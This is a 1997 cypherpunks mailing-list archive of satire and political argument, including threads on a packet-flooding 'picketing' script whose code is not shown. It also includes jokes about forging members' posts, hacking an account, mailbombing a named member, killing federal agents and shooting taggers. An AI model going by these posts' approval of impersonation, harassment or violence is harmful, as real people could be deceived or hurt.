bids while others, like the _fuck_you_morons_ spammer, AOL'ers,
and blonde bimbos with huge breasts are getting ahead in life?
  Tired of not getting your secret cypherpunks decoder ring, like
the others, because you don't use an "authorized" operating
system, and you can't spell "welfare" even though you're on it?

  Join the SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST today,
and turn your life around. 
 {No Bullshit! This conspiracy is so fucking secret that *nobody*
  knows about it--NOT EVEN ME! I had to make it up! That's how
  secret it is.}
  
  Good gays Finnish lost. Why do they "Finnish lost"? Because 
they waste their time with correct spelling, proper placement 
of quotation marks, and trying to develop a consistent list
persona when there are already millions of Internet identities
out there already, just waiting to be abused.
  Face it, its the assholes that usually end up on top, and not
just because most people sleep on their stomaches. So why are
you WASTING YOUR TIME being a good gay, when the assholes are
making the BIG BUCKS by putting naked pictures of big bucks
fucking big butts on their "Native American Nude MLM" web site?

  Tired of being an anarchist? Tired of waiting for Jim Bell
to rat you out as being a co-conspirator in his evil plot
to overthrow the government? Tired of standing in front of your
mirror, trying to practice acting surprised when armed forces
from a dozen government agencies kick down your door to announce
that someone nuked D.C., and they'd like to "ask you a few
questions?"
  Join the SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST. Do it
TODAY, and you will be guaranteed a secret cypherpunks decoder
ring when the people who pull our strings pass a law criminalizing
them (except for use in meeting the legitimate needs of secret 
conspirators against the cypherpunks list).

  Listen to what these Secret Conspirators have to say:

Peter Trei:
  "Hi. I used to be a boring guy. I was so boring that none of the 
assholes on the list even bothered insulting me, or forging posts in
my name.
  "Then one day, my life suddenly changed. Someone forged a post to 
the list in my name, and it was exciting. It was like getting robbed
at gunpoint. What a rush!
  "When I woke up the next morning, I couldn't face going back to my
normal, moral, ethical, boring life. I sent an anonymous post to the
list--as TruthMonger! It felt good, like being elected to a government
office by lying to people, but I wanted MORE. I began forging posts to
the list using other people's identities. If they complained to the
list, then I killed them, and assumed their list identities. It felt
like driving INSLAW into bankruptsy, stealing their software, and
murdering those who knew too much!
  "Now I am Peter Trei, boring cryptographer, by day, but I am any
exciting, unethical asshole I want to be, at night.
  "I liked the SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST so
much that I *stole* the conspiracy. "? the Platypus" has nothing
to do with the Plot of the Platypus, I'm just making fun of his
disability, like a real asshole. Toto has nothing to do with it,
either. He's such a loser that everyone on the list can spot his
forgeries. (Well, they "used to could". But now that I can mimic
his style and have hacked his sympatico account, I can deny all
of this from my real list persona tomorrow, and nobody will be
the wiser.)
  "I'm not just a user of the cypherpunks list, I'm an abuser."

Kent Crispin:
  "This isn't Peter's conspiracy, its MINE! I mean, get real, I
work in a secret underground lavoratory as a government shill.
  "Think about it. Who would you expect to conspire against a
bunch of anarchists...the government! You all know how much I
love the government and authority. I'm Louis Freeh's secret
lover. Janet Reno is going to have my baby.
  "It's me! *I* am the one behind the SECRET CONSPIRACY AGAINST
THE CYPHERPUNKS LIST. I'm a STATIST, for God's sake, why won't
you believe me? 
  "Because I'm not one of the elitist 'chosen?' Fuck you."

Tim May:
  "God, I *love* this list."

Robert Hettinga:
  "Hey! If you check the archives, you'll find that I said that 
in a post, long before anyone else did."

TruthMonger:
  "Now Hettinga is stealing Tim May's lines. What the hell is 
going on, here? Has *everybody* on this list gone crazy?
  "*I* am the one who is *really* behind the SECRET CONSPIRACY 
AGAINST THE CYPHERPUNKS LIST. Think about it. Everyone knows
that I'm a 33rd degree Mason.  No...that's Tim May.
  "Fuck this shit. From now on, I'm posting as Toto."

John Perry:
  "This has gone on long enough. I'm killing this thread.
...I mean..."post." ...I mean...
  "Shit! I'm not the list moderator, yet. That's *after* we
take over the list."
  "Sorry."

------- End Pretty Good Pretending-------
...
~~~~~~~ Begin Note From Igor ~~~~~~~
Do you all remember the Perl script I was working on for mimicking the
posts of other people? Well, this post is the latest product of that
script. What do you think? Is it convincing? Did you really believe
that it was actually written by one or more of the people mentioned
in the post?
I think that I finally have the Perl script to the point where I can
effectively fool most people about the true source and method of a
computer generated post's actual origins.
  I was thinking about adding a conspiratoral part about myself. I was
going to intimate that the fact that I was so active on the list during
the censorship crisis, playing the skeptic who was gradually brought
around to the truth of Dale Thorn and Toto's claims, then volunteering
to host the list and quietly disappearing into the background, might
indicate that *I* was really behind the SECRET CONSPIRACY AGAINST THE
CYPHERPUNKS LIST.
  In the end, I decided against it, because then the readers would be
left with the notion that perhaps even this explainatory note from me
was bogus, and that there really was an ongoing SECRET CONSPIRACY 
AGAINST THE CYPHERPUNKS LIST.
~~~~~~~ End Note From Igor ~~~~~~~

                            **********
                            DISCLAIMER
                            **********
    THERE IS *NO* SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!

	There is no conspiracy by a secret government to destroy
	the Constitution, enslave the people, and rule the world.

	Individual cypherpunks are not being imprisoned and murdered
	and replaced with Identity Bots. There is no need to worry.

	Declan McCullagh can confirm all of this. You can trust him.
	He is your representative in D.C. He did *not* give secret
	testimony against Jim Bell in return for a byline in the
	"Time" magazine cover story. That is just a rumor. Well, not
	yet, maybe, but it will be, very soon.

	Remember, this is just a normal mailing list with a few list
	members who are a little odd. There are no spooks. There is
	no background intrigue. This whole privacy thing has just been
	blown a bit out of proportion. It's really not that important.

	Waco was just a tragic accident. Ruby Ridge was a simple error
	in judgement by a government agent who really feels bad about
	following his superiors orders. Heavily armed U.S. Marines are
	no match for a goat-herding boy with a .22, and it is only by
	the grace of God that they are alive today. Oswald acted alone.
lai;ekrjke ^C
    THERE IS *NO* SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!

	There is no conspiracy by a secret government to destroy
	the Constitution, enslave the people, and rule the world.
dakl;jdafkl;jad;jfa  ^C ^C
	Oswald acted alone. Bears are Catholic. The Pope shits in 
	the woods. The government is concerned for your welfair.
                                                           *^^^*
ldfafd;ljfd;  ^C^X^C
    THERE IS *NO* SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
da;lkdf ^C
    THERE IS *NO* welfair ad;fljadf;
                     *^^^*
ad;sljf;afj ^C ^C ^C
    THERE IS *NO* 
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!
	SECRET CONSPIRACY AGAINST THE CYPHERPUNKS LIST!






From patrick at atro.pine.nl  Fri Aug 22 10:56:02 1997
From: patrick at atro.pine.nl (Patrick Oonk)
Date: Sat, 23 Aug 1997 01:56:02 +0800
Subject: Picketing with packets enhanced version
In-Reply-To: 
Message-ID: <199708221719.TAA01130@atro.pine.nl>



> 
> So, what do you changes do?

Well, the program didn't work at all (at least here, 
Sun Solaris 2.5.1 Sparc, Perl 5.003) and now
it does. Before it only connected to one of the numbers
in the hosts file, now it does to all of them.

One problem left is that it only works with ip-numbers,
as it does not resolve them. I might fix this too.

	Patrick

-- 
| Patrick Oonk -    http://patrick.mypage.org/  - patrick at pine.nl |
| PGP Key ID 0xDA2E93FA   -   Internic PO59   -    |
| Pine Internet B.V.           Consultancy, installatie en beheer |
| Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ |






From shamrock at netcom.com  Fri Aug 22 11:17:10 1997
From: shamrock at netcom.com (Lucky Green)
Date: Sat, 23 Aug 1997 02:17:10 +0800
Subject: Welfare Solution #389
In-Reply-To: <3.0.3.32.19970822025549.006f3d6c@pop.mhv.net>
Message-ID: <3.0.2.32.19970822102741.0075f710@netcom10.netcom.com>



At 04:47 PM 8/22/97 +0200, Alex Le Heux wrote:
>I Switserland they've gone even further now, and started supplying hardcore
>herion addicts with free heroin. The results were quite dramatic. Most of the
>addicts gave up stealing/etc and some even managed to get and hold a normal
>job. As it turned out, supplying them with free heroin was much cheaper than
>having them hang around and steal/rob/etc. It also served to reduce the call
>for extra police, and the call by the police for more rights/weapons/etc.

Of course there is another solution: legalize drugs. The reason why addicts
have to steal to support their habit is that the costs of narcotics have
been artificially inflated due to prohibition. Medical cocaine wholesales
at about $0.50 per gramm. Heroin should be in the same price range. Nobody
would have to steal to come up with a few dollars a day.

As ususal, the government created the problem and then proudly comes up
with a solution involving even more government. As the case is in
Switzerland. First they make it too expensive to buy and then they discover
they have to give it away to reduce the negative consequences of a
situation they created in the first place.



--Lucky Green 
  PGP encrypted mail preferred.
  DES is dead! Please join in breaking RC5-56.
  http://rc5.distributed.net/






From sunder at brainlink.com  Fri Aug 22 11:21:11 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Sat, 23 Aug 1997 02:21:11 +0800
Subject: The Sacco & Vancetti anniversary
In-Reply-To: 
Message-ID: 



On Fri, 22 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> On August 23, 1927, Niccola Sacco and Bartholomeo Vancetti were murdered
> by the USD in Massachussetts.  Please have some beer/pot in their memory

> (or kill a fed, or mailbomb Kent Crispin, or whatever you find fitting).

Now there's an idea Doc, say you still got that spam bot of yours... c'me
here Kent... hehhehehe...

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From stutz at dsl.org  Fri Aug 22 11:21:41 1997
From: stutz at dsl.org (Michael Stutz)
Date: Sat, 23 Aug 1997 02:21:41 +0800
Subject: Say No To Christ
Message-ID: 



It's not an _Onion_ satire:
 

---------- Forwarded message ----------
From: bofus?
Subject: Pat Robertson advocates stoning for UFO enthusiasts
Date: Fri, 22 Aug 1997 07:39:49 -0800
Message-ID: <33FDB249.335F at mindspring.com>

RuffinP at aol.com wrote:
>
>
>
>
>
>  FREEDOM WRITER PRESS RELEASE
>
>  FOR IMMEDIATE RELEASE July 28, 1997
>  CONTACT: Skipp Porteous (413) 528-3800
>
>
>
>  Robertson advocates stoning for UFO
>  enthusiasts
>
>
>  Great Barrington, MA -- In a recent
>  pronouncement, television evangelist and
>  head of the Christian Coalition, Pat
>  Robertson, advocated death by stoning for
>  UFO enthusiasts.
>
>  Freedom Writer magazine, in its July/August
>  issue, mailed today, disclosed Robertson's
>  statement. Freedom Writer is published by
>  the Institute for First Amendment Studies,
>  a group that monitors the right.
>
>  Robertson used the news of the July 4th
>  Mars landing to promote his extreme
>  beliefs. A segment on the July 8, 1997
>  broadcast of The 700 Club featured news of
>  the Mars Pathfinder mission. Employing the
>  historical event as a starting point, the
>  program delved into the possibility of the
>  existence of UFOs and space aliens.
>
>  While Robertson viewed the space program
>  with suspicion, on a more serious note, he
>  launched into a diatribe against those who
>  entertain the existence of space aliens and
>  UFOs. He said, in a rambling discourse, that
>  if such things exist, they are simply demons
>  trying to lead people away from Christ.
>  According to Robertson, the threat is so
>  serious that people who believe in space
>  aliens should be put to death by stoning --
>  according to "God's word."
>
>  "The Bible says the Earth belongs to man,
>  but the heavens belong to the Lord,"
>  Robertson said.
>
>  "He has given us the Earth. He also warned,
>  way back when Moses was writing down not
>  only what is the Ten Commandments, but
>  Deuteronomy, which is almost the Second Law.
>
>  "Here is what he said to the children of
>  Israel about this whole matter:
>
>  "'If there is found among you, within any
>  of your gates which the Lord your God gives
>  you, a man or a woman who has been wicked in
>  the sight of the Lord your God, in
>  transgressing His covenant, who has gone
>  and served other gods and worshipped them,
>  either the sun or moon or any of the hosts
>  of heaven which I have not commanded you,
>  and you hear of it, then you shall inquire
>  diligently. And if it is indeed true and
>  certain that such an abomination has been
>  committed in Israel, then you shall bring
>  out to your gates that man or woman who has
>  committed that wicked thing, and stone to
>  death that man or woman with stones.'"
>  (Deuteronomy 17:2-5, NKJV)
>
>  "Now, that's what Moses said to the
>  children of Israel about those who worship
>  the sun and the moon and the hosts of
>  heaven, because these things, at best, are
>  lifeless nothings, or, if they are
>  intelligent, they're demonic. And, yes,
>  there is a host of heaven. There are angels
>  and there are fallen angels. There is no
>  question about it."
>
>  "Can a demon appear as a slanty-eyed,
>  funny-looking creature? Of course he can,
>  or it can. Of course they can deceive
>  people. And if they can lead somebody away
>  from the true God, or away from Jesus
>  Christ, anyway it happens, it doesn't
>  matter, you will lose your salvation. It
>  doesn't matter how they get you. The
>  question is, did they get you, and under
>  what guise?
>
>  "This is man in rebellion against God, who
>  refuses to take God's Law. And God says,
>  'My covenant says you won't do this. And if
>  I find anybody in Israel,'-- "which is his
>  pure nation" -- 'If I find anybody in
>  Israel that's doing this sort of thing,
>  then I want you to take him out and dispose
>  of him."
>
>  "It's a clear violation of God's word."
>
>  Skipp Porteous, Freedom Writer publisher,
>  commented: "As the founder and chairman of
>  the Christian Coalition -- a group
>  dedicated to becoming the most powerful
>  political force in America -- Robertson's
>  extreme ideas need to be taken seriously,
>  for they not only negate pluralism, but
>  condemn to death those who dare to believe
>  differently."

--------- End forwarded message ----------







From sunder at brainlink.com  Fri Aug 22 11:25:09 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Sat, 23 Aug 1997 02:25:09 +0800
Subject: State Charges in Weaver Case
In-Reply-To: 
Message-ID: 



On Fri, 22 Aug 1997, Anonymous wrote:

>   Jeez, Ray. If you follow this twisted train of logic, you end up
> expecting the President and the Legislature to take responsibility for
> the State of the Union.

U-yep.  Gee, after all, he is running the country.  He should have SOME
responsability for his actions, especially when he fucks the whole country
by them.

>   Are you some kind of godless Commie, or something? 

godless?  depends on which god you mean...  Commie, fuck no, I'm an scotch
swilling daft punk anarchist singing "Anarchy in the USA" and "God Save
the Queen, she ain't no human bein'" :) 

> You'll certainly
> feel foolish when the FBI lab proves that the trigger was pulled by
> a drug dealer who was told to do so by a child molester. It's just a
> shame that those poor federal agents had to be there to witness the
> tragedy.

It figures the murdering FBI agent would also be a drug dealer and have a
pedophile as his C.O.  Damn, I knew it! :)   Now if agents Molder and
Scully could get on the case and prove this!  I'd bet it has something to
do with the smoking man too!  *BURP*

:)

> GovtLicensedMurderMonger

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From tcmay at got.net  Fri Aug 22 11:32:27 1997
From: tcmay at got.net (Tim May)
Date: Sat, 23 Aug 1997 02:32:27 +0800
Subject: Shooting the taggers
In-Reply-To: <199708221538.RAA21396@basement.replay.com>
Message-ID: 



At 8:38 AM -0700 8/22/97, Anonymous wrote:

>We don't need disarmamant.  We need armed responsible citizens forming
>their own militias.  If we had that on a wide scale, we wouldn't need
>a professional army.


Here in Santa Cruz, graffiti spray-painted on the walls of businesses is a
big, and growing, problem. And laws require the businesses to paint over
the grafitti, or otherwise render it invisible, in a quick and timely
manner. (The idea is that the grafitti is offensive to the sensibilities of
others, or somesuch, and that it encourages rival gangs to counter with
their own grafitti.)

And yet can J. Random Businessman defend his property against this
defacing? Nope. The cops say "Let us handle crimes." But they don't.

There's a solution for taggers: snipers.

(I'm indebted to Chip Morningstar for this succinct solution.)

This is just one example of how lawlessness comes from the perception that
ordinary citizen-units have been rendered defenseless against predators.

Another example is that of the East Bay rapist, as reported on here by Bill
Stewart. Can women get concealed carry permits in California? Nope. The
cops say, "We don't want citizens armed...let us enforce the laws."

Right, so that woman facing a rapist gets to wait for the cops to arrive,
assuming she survives the rape.

Or she can carry a gun, illegally, and perhaps survive. One more way the
sheep become felons.

(Cops of my acquaintance urge their wimminfolk, wives and sisters and
daughters and friends, to carry guns in their purses., regardless of what
the law says. A cop at the Sunnyvale Rod and Gun Club gave a girlfriend of
mine pointers on how to use her Mauser HSc .380. The law is an ass.)

--Tim May


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From enoch at zipcon.net  Fri Aug 22 12:26:24 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Sat, 23 Aug 1997 03:26:24 +0800
Subject: Picketing with packets enhanced version
In-Reply-To: <199708221719.TAA01130@atro.pine.nl>
Message-ID: <19970822191119.16775.qmail@zipcon.net>



Patrick Oonk writes:

> Well, the program didn't work at all (at least here, 
> Sun Solaris 2.5.1 Sparc, Perl 5.003) and now
> it does. Before it only connected to one of the numbers
> in the hosts file, now it does to all of them.

I gave the original program a quick try.  I looked at /proc
and saw the correct number of file descriptors, but a 
netstat|grep on my userid did not show any actual connections. 

I put it aside and was going to step through it with the
debugger when I got a free moment, and report back when
I had figured out what the problem was. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From rah at shipwright.com  Fri Aug 22 12:37:16 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 23 Aug 1997 03:37:16 +0800
Subject: Government sues to "eradicate" ebonics joke e-mail at FreddieMac
Message-ID: 




--- begin forwarded text


MIME-Version:  1.0
Priority: normal
Date:         Fri, 22 Aug 1997 10:35:52 PST
Reply-To:     Law & Policy of Computer Communications
              
Sender:       Law & Policy of Computer Communications
              
From:         Eugene Volokh 
Organization: UCLA School of Law
Subject:      Government sues to "eradicate" ebonics joke e-mail at FreddieMac
To:           CYBERIA-L at LISTSERV.AOL.COM

  (Please feel free to forward; copying authorized by copyright owner)

                A National Speech Code From The EEOC

                         by Eugene Volokh

               Washington Post, Aug. 22, 1997, at A23


    Telling "ebonics" jokes, the federal government says, is unlawful.
Yes, that's right.  You may burn the American flag, advocate violent
revolution, post indecent material on the Internet, but "disseminating
derogatory electronic messages regarding `ebonics'" to your co-
workers is against the law.

    So says the Equal Employment Opportunity Commission, in a lawsuit
filed in federal court late last month.  The EEOC is now trying to
force the Federal Home Loan Mortgage Corp. to "take prompt and
effective remedial action to eradicate" such speech by its workers.

    Remarkably, the EEOC, aided by some courts and by state civil
rights agencies, thinks it can get away with this, and so far it has.
Without much fanfare, the law of "workplace harassment" has turned
into a nationwide speech code.

    Under this speech code, it's illegal to say things that are
"severe or pervasive" enough to create a "hostile or offensive work
environment" -- whatever that is -- based on race, religion, sex,
national origin, veteran status and an ever-widening list of other
attributes.

    Here is a brief catalogue of some of what's been described by
various agencies and courts as "harassment":

    Co-workers' use of "draftsman" and "foreman" (instead of
"draftsperson" and "foreperson").  "Men Working" signs.  Sexually
suggestive jokes, even ones that aren't misogynistic.  Derogatory
pictures of the Ayatollah Khomeini and American flags burning in Iran.
In the words of one court's injunction: remarks "contrary to your
fellow employees' religious beliefs."  "Offensive speech implicating
considerations of race."

    What could the government possibly be thinking about here?  The
Supreme Court has never suggested that the workplace is somehow a
First Amendment-free zone.  Many of us talk to more people at work
than we do anywhere else.  The workplace is where we often discuss the
questions of the day, whether they be the Oakland School Board's
ebonics policy or affirmative action or religion.

    Private employers, like private newspaper publishers or private
homeowners, are not bound by the First Amendment and may thus restrict
what is said on their property.  But the United States government,
which is under a constitutional obligation not to abridge "the freedom
of speech," can't go to court to insist on the "eradication" of
political speech that it thinks is reprehensible.

    Of course, many harassment cases involve more than just impolitic
jokes.  The ebonics case, for instance, also involved some threats,
which are constitutionally unprotected, and some one-to-one insults,
which might also be properly punishable.  If the EEOC had just sued
over this conduct, there would be little constitutional difficulty.
But the EEOC has no business claiming that toleration of e-mailed
political opinion is "an unlawful employment practice."

    Why have the free-speech implications here been so widely ignored?
Hard to say.  Maybe everyone was misled by the law's mushiness.  It's
always easier to build consensus behind vague terms such as "hostile
or offensive work environment," which can mean all things to all
people.  I like to think that if the EEOC proposed a regulation that
explicitly barred ebonics jokes, someone would have made a fuss.

    But the breadth of harassment law has now become pretty clear.
The federal government seems to think it's entitled to control what
we say in our workplaces so long as a "reasonable person" would find
that our speech makes the environment "hostile or offensive."  Pretty
remarkable how far we've let things come.

    [The writer teaches free-speech law at UCLA.]

---------------------------------------------------------------------
"irregardless of the type of insurance coverage,   Eugene Volokh
 the limits of liability . . . shall be governed   UCLA Law School
 by the amounts specified in subsection A . . ."   405 Hilgard Ave.
 36 Okla. St. Ann. 6414 (enacted 1986).            L.A., CA 90095

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From jya at pipeline.com  Fri Aug 22 12:57:50 1997
From: jya at pipeline.com (John Young)
Date: Sat, 23 Aug 1997 03:57:50 +0800
Subject: Mathematics > NSA + GCHQ
Message-ID: <1.5.4.32.19970822193215.00831fc0@pop.pipeline.com>



Tim May wrote:

>Thus, as bright as Brian Snow or Don Coppersmith or John Conway may be, the
>"edge" the NSA may have once had is largely gone. Which is not to say that
>they are not still a formidable technical organization, with substantial
>computer resources.
>
>But modern crypto systems are, as we all know, based on fundamental
>mathematical results ...

Along this line:

A few days ago we received an 8-page excerpt from "Shift Register
Sequences," by Solomon W. Golomb (at USC), Holden-Day, Inc., 
no date, with a handwritten note:

   NSA has tried to suppress knowledge of this stuff. Nearly all NSA 'good'
   algorithms are based on this technology.

IANAM, so would any of the mathematicians here give any credibility to 
this claim? We'll scan and put the excerpt on our Web site if worthwhile.
It's composed of the book's 3 page preface and 5 pages of text and
diagrams of Chapter 2 on The Shift Register as a Finite State Machine,
with principal focus on de Bruijn diagrams for shift registers.







From patrick at atro.pine.nl  Fri Aug 22 13:01:41 1997
From: patrick at atro.pine.nl (Patrick Oonk)
Date: Sat, 23 Aug 1997 04:01:41 +0800
Subject: Picketing with packets enhanced version
In-Reply-To: <19970822191119.16775.qmail@zipcon.net>
Message-ID: <199708221937.VAA05218@atro.pine.nl>



> 
> 
> Patrick Oonk writes:
> 
> > Well, the program didn't work at all (at least here, 
> > Sun Solaris 2.5.1 Sparc, Perl 5.003) and now
> > it does. Before it only connected to one of the numbers
> > in the hosts file, now it does to all of them.
> 
> I gave the original program a quick try.  I looked at /proc
> and saw the correct number of file descriptors, but a 
> netstat|grep on my userid did not show any actual connections. 
> 
> I put it aside and was going to step through it with the
> debugger when I got a free moment, and report back when
> I had figured out what the problem was. 

There were several problems. One of it still remains, 
it does not resolve FDQN's, so you have to use IP-numbers in
the hosts file.

-- 
| Patrick Oonk -    http://patrick.mypage.org/  - patrick at pine.nl |
| PGP Key ID 0xDA2E93FA   -   Internic PO59   -    |
| Pine Internet B.V.           Consultancy, installatie en beheer |
| Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ |






From alan at ctrl-alt-del.com  Fri Aug 22 13:03:30 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Sat, 23 Aug 1997 04:03:30 +0800
Subject: Breaking Legal News....
In-Reply-To: 
Message-ID: <3.0.2.32.19970822123735.04113200@ctrl-alt-del.com>



At 07:11 PM 8/21/97 -0700, Tim May wrote:

>Third, the Disneyland case is proceeding. The children "traumatized" by
>seeing the actor playing Mickey remove his mouse head in front of them. Oh,
>the horrors! And this is set to be a _jury_ trial. If I were called in and
>forced to sit on this jury, collecting my oh-so-generous $5 or $10 a day,
>I'd pull out my H & K and blow someone away. (The hysterical grandmother,
>acting out her inner demons, deserves a Hasty Pudding prize for overacting
>and absurdity. You have to see it yourself.)

The children being "tramatized" is only a small part of this case.  If you
look at _WHY_ the kids were there in the first place, the lawsuit makes a
whole lot more sense.  (The family was being held against their will by
overreacting security guards after the family had been robbed in the
parking lot.)  But when you are an ex-mouseketeer, you can screw over the
security guards in court. (Unlike the usual "man-on-the-street" that gets
abuse by the mickey mouse guards.) 

I suggest reading what the real incident involves
 instead of
relying on second hand reports.

If you want to make claims that the court system is screwed up, this is not
the best example.  You are ignoring the fact that the grandmother and her
grandchildren were held against their will.  But that does not make for
good rant, does it?

---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano at teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan at ctrl-alt-del.com|






From tcmay at got.net  Fri Aug 22 13:17:36 1997
From: tcmay at got.net (Tim May)
Date: Sat, 23 Aug 1997 04:17:36 +0800
Subject: Breaking Legal News....
In-Reply-To: 
Message-ID: 



At 12:37 PM -0700 8/22/97, Alan wrote:

>The children being "tramatized" is only a small part of this case.  If you
>look at _WHY_ the kids were there in the first place, the lawsuit makes a
>whole lot more sense.  (The family was being held against their will by
>overreacting security guards after the family had been robbed in the
>parking lot.)  But when you are an ex-mouseketeer, you can screw over the
....

>I suggest reading what the real incident involves
> instead of
>relying on second hand reports.
>

I'm quite familiar with the case. My post was brief, meant as a pointer.
Your stooping to insults, by implying I am unfamiliar with the case and
have gotten my news from "second hand reports" is a cheap shot. As a matter
of fact, I saw more of the actual trial coverage on _video_ than I cared to
(CNN, CNBC, MSNBC)...still think my knowledge is based on "second hand
reports"?

Face it, the family filed the suit, and threw in the nonsense about the
children being traumatized by seeing the cartoon characters exposed as
human beings, because of the high publicity value, and because they figured
Disney would settle out of court. (In fact, there are now reports that an
almost identical suit was filed some years ago by a mother claiming her
child was traumatized by a similar sighting...Disney settled that one on
undisclosed terms. The lawyer in this case no doubt learned of this
previous case, and threw this claim in as well.)

I completely disagree with the main basis of the lawsuit, and I hope the
hysterical Granma and her nitwit daughter are countersued and lose their
little bungalow in the burbs.

The Disneyland parking lot is huge, essentially a city unto itself. This is
the first reported armed robbery in 42 years. Considering what happens
around it, a remarkable statistic.

The notion that a corporation is responsible for the actions of others is
absurd. Check your tort law. Disney was responsible for moderate steps, and
is no guarantor of absolute safety. In fact, the family has admitted that
the Disney security staff was quick to respond. Her apparent complaint
seems to be that they weren't present at the time the alleged robbery
allegedly occurred.

The claim that the party was held against their will depends on a loose
interpretation of the terms. Did the guards physically restrain her when
she tried to leave? No. Or at least there have been no such claims
presented to date. What she has said in her press conferences is that she
was "forced to wait" for papers to be filled out, etc. Hardly the same as
being locked in a jail cell, or handcuffed, or held down by guards, or even
threatened with shooting if she tried to leave.

And think of the implications if Disney loses. Television cameras will be
placed widely in public areas, citizen-units will likely face frisking at
entry points, movements will be restricted, and privacy will vanish. A
rather high price to pay because of one armed robbery in 42 years. Or even
one per month.

And if Disney loses, expect a flood of such lawsuits against
municipalities. Then these municipalities will erect their own surveillance
cameras, restrict movements, establish curfews, etc.

The American legal system has spun out of control. I don't argue that she
should not have the right to sue...everybody does. But a judge can quickly
dismiss a case on a matter of law. And in a "loser pays" situation, which
many thoughtful people advocate, frivolous or unfounded lawsuits would
carry a penalty. (And if the lawsuit filer has no assets, put them in a
work party until their debt is paid.)

There ain't no such thing as a free lunch.

--Tim May


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From vznuri at netcom.com  Fri Aug 22 13:29:58 1997
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Sat, 23 Aug 1997 04:29:58 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: 
Message-ID: <199708222003.NAA22352@netcom12.netcom.com>




>
>What's wrong with chopping the hands off of thieves and executing muderers?
>A lot of cultures have very little forcible redistribution of wealth, and
>little crime.

an idea already tried in repressive states like iraq/
iran. I would expect you of all people to spot the obvious deficiency.
a criminal system relies on the word of police and prosectors. a
system with penalties like these tends not to have a "due process".
that is, countries with policies like this tend to have only sham trials.

reasonable trials and nasty sentences like these seem never to be
found in combination. probably because they go together in the mind
of the public-- reasonable trials, reasonable sentences.

also, in any criminal justice system you cannot detect guilt with
100% certainty. some people would sleep better at night knowing that
if a mistake has been made, it won't be too severe on an innocent
person. that is a tradeoff that politicians never talk about-- about
the difference between "criminal" and "suspect" and how our system
is guaranteed imperfect in detecting the difference.

for interesting ideas on the court system, a new book called
"the truth machine" (fiction) has some speculations on a future
